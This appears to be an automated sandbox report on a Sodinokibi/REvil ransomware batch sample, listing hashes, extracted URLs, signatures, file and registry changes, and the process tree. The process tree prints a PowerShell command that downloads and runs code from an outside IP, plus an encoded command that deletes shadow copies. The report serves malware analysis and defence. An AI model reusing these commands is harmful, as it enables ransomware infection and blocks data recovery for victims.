Analysis
-
max time kernel
134s -
max time network
54s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
19-05-2020 05:10
Static task
static1
Behavioral task
behavioral1
Sample
b63535d35f9c9567c0746741d709d3ec.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
b63535d35f9c9567c0746741d709d3ec.bat
Resource
win10v200430
General
-
Target
b63535d35f9c9567c0746741d709d3ec.bat
-
Size
215B
-
MD5
af820466ba8a425cc2616229818a51cf
-
SHA1
9b8b46c04b3e16d6c6b98db7ed9423b2c7ba78bb
-
SHA256
1a887694ba9f6fda88acd9489627ab0c6aecb03059490ece4c94af2007d9867c
-
SHA512
eb7f0b0f20201774182cedd5df9a0d22be50128cac83341bccee3521d86cd8f029f2f921b54fd17da28ffc9be3eb579dcd12207be8abd4c109bc9148fe59b186
Malware Config
Extracted
http://185.103.242.78/pastes/b63535d35f9c9567c0746741d709d3ec
Extracted
C:\03jxs-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5F471805E27ADD53
http://decryptor.cc/5F471805E27ADD53
Signatures
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1432 wrote to memory of 644 1432 cmd.exe powershell.exe PID 644 wrote to memory of 1860 644 powershell.exe powershell.exe PID 644 wrote to memory of 1860 644 powershell.exe powershell.exe PID 644 wrote to memory of 1860 644 powershell.exe powershell.exe PID 644 wrote to memory of 1860 644 powershell.exe powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 644 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 644 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 644 powershell.exe 644 powershell.exe 644 powershell.exe 1860 powershell.exe 1860 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe 644 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 23 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ShowWait.wmx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\03jxs-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\03jxs-readme.txt powershell.exe File opened for modification \??\c:\program files\CheckpointConvert.vdx powershell.exe File opened for modification \??\c:\program files\CloseMeasure.tmp powershell.exe File opened for modification \??\c:\program files\DisableEdit.bmp powershell.exe File opened for modification \??\c:\program files\LimitExit.iso powershell.exe File opened for modification \??\c:\program files\NewProtect.M2V powershell.exe File opened for modification \??\c:\program files\SaveMount.au3 powershell.exe File opened for modification \??\c:\program files\StopFormat.html powershell.exe File opened for modification \??\c:\program files\UnpublishRename.xlsb powershell.exe File created \??\c:\program files (x86)\03jxs-readme.txt powershell.exe File opened for modification \??\c:\program files\CompareInitialize.m4a powershell.exe File opened for modification \??\c:\program files\FindConfirm.dot powershell.exe File created \??\c:\program files\microsoft sql server compact edition\03jxs-readme.txt powershell.exe File created \??\c:\program files\03jxs-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertUse.DVR-MS powershell.exe File opened for modification \??\c:\program files\LockUnblock.ppt powershell.exe File opened for modification \??\c:\program files\UseReset.txt powershell.exe File opened for modification \??\c:\program files\CheckpointHide.mpv2 powershell.exe File opened for modification \??\c:\program files\OutOpen.wma powershell.exe File opened for modification \??\c:\program files\RequestDisconnect.php powershell.exe File opened for modification \??\c:\program files\ResizeCopy.vdw powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\475.bmp" powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 644 powershell.exe Token: SeDebugPrivilege 644 powershell.exe Token: SeDebugPrivilege 1860 powershell.exe Token: SeBackupPrivilege 1580 vssvc.exe Token: SeRestorePrivilege 1580 vssvc.exe Token: SeAuditPrivilege 1580 vssvc.exe Token: SeTakeOwnershipPrivilege 644 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\b63535d35f9c9567c0746741d709d3ec.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b63535d35f9c9567c0746741d709d3ec');Invoke-GQWTYAZL;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
PID:644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1580